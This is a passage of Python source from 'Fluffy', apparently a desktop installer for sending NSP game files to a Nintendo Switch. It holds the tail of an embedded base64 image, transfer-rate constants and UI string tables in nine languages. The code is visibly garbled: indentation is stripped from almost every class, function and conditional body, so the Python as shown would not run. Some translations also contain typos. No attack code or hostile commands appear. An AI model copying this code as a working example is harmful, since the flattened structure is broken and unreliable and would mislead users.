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'
class TransferRates:
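    # Chunk sizes, in bytes, used when streaming NSP data:
    # Safe = 0x1F4 (500 B), Normal = 0x100000 (1 MiB).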
Safe = 0x1F4
Normal = 0x100000
TransferRateDict = {0: TransferRates.Safe,
1: TransferRates.Normal}
# "Language!" -Cap, May 1st 2015
def set_language(v):
global language
language = v
if v == 0:
Language.CurrentDict = Language.EnglishDict
elif v == 1:
Language.CurrentDict = Language.ChineseDict
elif v == 2:
Language.CurrentDict = Language.VietDict
elif v == 3:
Language.CurrentDict = Language.TurkishDict
elif v == 4:
Language.CurrentDict = Language.BrazilianDict
elif v == 5:
Language.CurrentDict = Language.ItalianDict
elif v == 6:
Language.CurrentDict = Language.FrenchDict
elif v == 7:
Language.CurrentDict = Language.SpanishDict
elif v == 8:
Language.CurrentDict = Language.GermanDict
class Language:
CurrentDict = None
EnglishDict = {0: "Fluffy",
1: "Begin Transfer",
2: "Switch IP",
3: "This Computer's IP",
4: "USB Transfer Mode",
5: "Normal Mode",
6: "Safe Mode",
7: "Current NSP",
8: "Successfully Installed",
9: "Awaiting Selection",
10: "Switch Not Detected",
11: "Switch Detected",
12: "Network Mode",
13: "NSP Selection",
14: "NSP(s) Selected",
15: "Awaiting Connection Request",
16: "Cancel",
17: "Error: Goldleaf threw an exception.",
18: "Error: Tinfoil threw an exception.",
19: "Error: Network threw an exception.",
20: "Dark Mode",
21: "Options",
22: "Language",
23: "Github",
24: "Network",
25: "Headers Sent",
26: "NSP(s) in Queue",
27: "Installing",
28: "Transfer Rate",
29: "Current NCA",
}
ChineseDict = {0: "Fluffy 卷卷安装器",
1: "开始传输",
2: "Switch的IP地址",
3: "此电脑的IP地址",
4: "USB传输模式",
5: "正常模式",
6: "安全模式",
7: "当前的NSP游戏文件",
8: "成功安装",
9: "等待选择",
10: "Switch没有连接",
11: "Switch已连接",
12: "网络模式",
13: "选择NSP游戏文件",
14: "个NSP游戏文件 已选择",
15: "等待连接",
16: "取消",
17: "错误: Goldleaf 反馈了一个异常.",
18: "错误: Tinfoil 反馈了一个异常.",
19: "错误: 网络状态 反馈了一个异常.",
20: "黑暗模式",
21: "选项",
22: "语言切换",
23: "Github主页地址",
24: "网络",
25: "发送NSP头文件",
26: "个NSP游戏文件 在队列中",
27: "NSP游戏文件 安装中",
28: "传输速率",
29: "当前的NCA游戏文件包",
}
VietDict = { 0: "Fluffy",
1: "Bắt Đầu Chuyển",
2: "IP Của Switch",
3: "IP Của Máy Vi Tính",
4: "Tốc Độ USB",
5: "Tốc Độ Bình Thường",
6: "Tốc Độ Chậm",
7: "Đang Chuyển NSP",
8: "Tải Xông",
9: "Hãy Chọn NSP Của Bạn",
10: "Không Thể Tìm Thấy Switch Của Bạn",
11: "Tìm Được Switch Của Bạn",
12: "Bạn Đã Chọn Chuyển Bằng Wi-Fi",
13: "Xin Vui Lòng Chọn NSP",
14: "Cái NSP(s) Đã Được Chọn",
15: "Đang Chờ Yêu Cầu Kết Nối",
16: "Hủy Bỏ",
17: "Error: Goldleaf ngừng hoạt động.",
18: "Error: Tinfoil ngừng hoạt động.",
19: "Error: Network ngừng hoạt động.",
20: "Hình Tối",
21: "Sự Lựa Chọn",
22: "Ngôn Ngữ",
23: "Github",
24: "Network",
25: "Danh Sách NSP Đã Gởi Cho Bạn",
26: "Đang Chờ Chuyển NSP(s)",
27: "Đang Tải",
28: "Tốc Độ",
29: "Đang Chuyển NCA",
}
BrazilianDict = {0: "Fluffy",
1: "INICIAR TRANSFERÊNCIA",
2: "IP do Switch",
3: "IP deste computador",
4: "Modo de transferência USB",
5: "Modo normal",
6: "Modo seguro",
7: "NSP atual",
8: "Instalado com sucesso",
9: "Aguardando seleção",
10: "Switch não detectado",
11: "Switch detectado",
12: "Modo de rede",
13: "Selecione o NSP",
14: "NSP(s) selecionados",
15: "Aguardando pedido de conexão",
16: "CANCELAR",
17: "Erro: Problema reportado pelo Goldleaf.",
18: "Erro: Problema reportado pelo Tinfoil.",
19: "Erro: Problema reportado pela rede.",
20: "Tema escuro",
21: "Opções",
22: "Língua",
23: "Github",
24: "Rede",
25: "Cabeçalho enviado",
26: "NSP(s) em fila",
27: "Instalando",
28: "Velocidade de transferência",
29: "NCA atual",
}
ItalianDict = {0: "Fluffy",
1: "Inizia Trasferimento",
2: "IP della Switch",
3: "IP di questo Computer",
4: "Trasferimento USB",
5: "Modalità Normale",
6: "Modalità Sicura",
7: "NSP Corrente",
8: "Installazione Avvenuta con Successo",
9: "In attesa di selezione",
10: "Switch Non Rilevata",
11: "Switch Rilevata",
12: "Modalità Network",
13: "Seleziona NSP",
14: "NSP(s) Selezionato(i)",
15: "In Attesa di Richiesta di Connessione",
16: "Annulla",
17: "Errore: Goldleaf ha lanciato una eccezione.",
18: "Errore: Tinfoil ha lanciato una eccezione.",
19: "Errore: eccezione nella Modalità Network.",
20: "Dark Mode",
21: "Opzioni",
22: "Lingua",
23: "Github",
24: "Network",
25: "Headers Inviati",
26: "NSP(s) in Coda",
27: "Installazione in Corso",
28: "Velocità di Trasferimento",
29: "NCA Corrente",
}
TurkishDict = {0: "Fluffy",
1: "Aktarmaya Başla",
2: "Switch IP 'si",
3: "Bu bilgisayarın IP 'si",
4: "USB Transfer Modu",
5: "Normal Mod",
6: "Güvenli Mod",
7: "Şu anki NSP",
8: "Başarıyla Yüklendi",
9: "Seçim Bekleniyor",
10: "Switch Algılanamadı",
11: "Switch Algılandı",
12: "Ağ Modu",
13: "NSP Seçimi",
14: "NSP(ler) Seçildi",
15: "Bağlantı İsteği Bekleniyor",
16: "İptal",
17: "Hata: Goldleaf 'te sıradışı durum oluştu.",
18: "Hata: Tinfoil 'de sıradışı durum oluştu.",
19: "Hata: Ağda sıradışı durum oluştu.",
20: "Karanlık Mod",
21: "Ayarlar",
22: "Dil",
23: "Github",
24: "Ağ",
25: "Başlık Gönderildi",
26: "Sıradaki NSP(ler)",
27: "Yükleniyor",
28: "Aktarma Hızı",
29: "Şu anki NCA",
}
FrenchDict = {0: "Fluffy",
1: "Démarrer le Transfert",
2: "IP de la Switch",
3: "IP de l'Ordinateur",
4: "Mode de Transfert USB",
5: "Mode Normal",
6: "Mode Sûr",
7: "NSP Actuel",
8: "Installé Avec Succès",
9: "En Attente de Sélection",
10: "Switch Non Détecté",
11: "Switch Détecté",
12: "Mode Réseau",
13: "Ajouter NSP",
14: "NSP(s) Sélectionné(s)",
15: "En Attente de la Demande de Connection",
16: "Annuler",
17: "Erreur: Goldleaf a généré une exception.",
18: "Erreur: Tinfoil a généré une exception.",
19: "Erreur: Le réseau a généré une exception.",
20: "Mode Sombre",
21: "Options",
22: "Langue",
23: "Github",
24: "Réseau",
25: "En-têtes Envoyées",
26: "NSP(s) en File d'Attente",
27: "En Cours d'Installation",
28: "Débit",
29: "NCA Actuel",
}
SpanishDict = {0: "Fluffy",
1: "Iniciar la Transferencia",
2: "IP de la Switch",
3: "IP del Ordenador",
4: "Modo de Transferencia USB",
5: "Modo Normal",
6: "Modo Seguro",
7: "NSP Actual",
8: "Instalado Con Éxito",
9: "Esperando Selección",
10: "Switch No Detectada",
11: "Switch Detectada",
12: "Modo Red",
13: "Añadir NSP",
14: "NSP(s) Seleccionado(s)",
15: "Esperando la Solicitud de Conexión",
16: "Cancelar",
17: "Error: Goldleaf ha generado una excepción.",
18: "Error: Tinfoil ha generado une excepción.",
19: "Error: El red ha generado une excepción.",
20: "Modo Oscuro",
21: "Opciones",
22: "Idioma",
23: "Github",
24: "Red",
25: "Cabeceras Enviadas",
26: "NSP(s) en la Cola",
27: "Instalando",
28: "Velocidad",
29: "NCA Actual",
}
GermanDict = {0: "Fluffy",
1: "Übertragung starten",
2: "Switch-IP-Adresse",
3: "Computer-IP-Adresse",
4: "USB-Übertragungsmodus",
5: "Normaler Modus",
6: "Sicherer Modus",
7: "Momentane NSP",
8: "Erfolgreich installiert",
9: "Warte auf Auswahl",
10: "Keine Switch erkannt",
11: "Switch erkannt",
12: "Netzwerk-Modus",
13: "NSP-Auswahl",
14: "NSP(s) ausgewählt",
15: "Warte auf Verbindung",
16: "Abbrechen",
17: "Goldleaf-Fehler!",
18: "Tinfoil-Fehler!",
19: "Netzwerk-Fehler!",
20: "Dunkles Design",
21: "Einstellungen",
22: "Sprache",
23: "GitHub",
24: "Netzwerk",
25: "Header gesendet",
26: "NSP(s) in Warteschlange",
27: "Installiere",
28: "Transferrate",
29: "Momentane NCA",
}
set_language(language)
# End Language
# Setters
def set_dark_mode(v):
global dark_mode
if v == 0:
import qdarkstyle
app.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())
dark_mode = 0
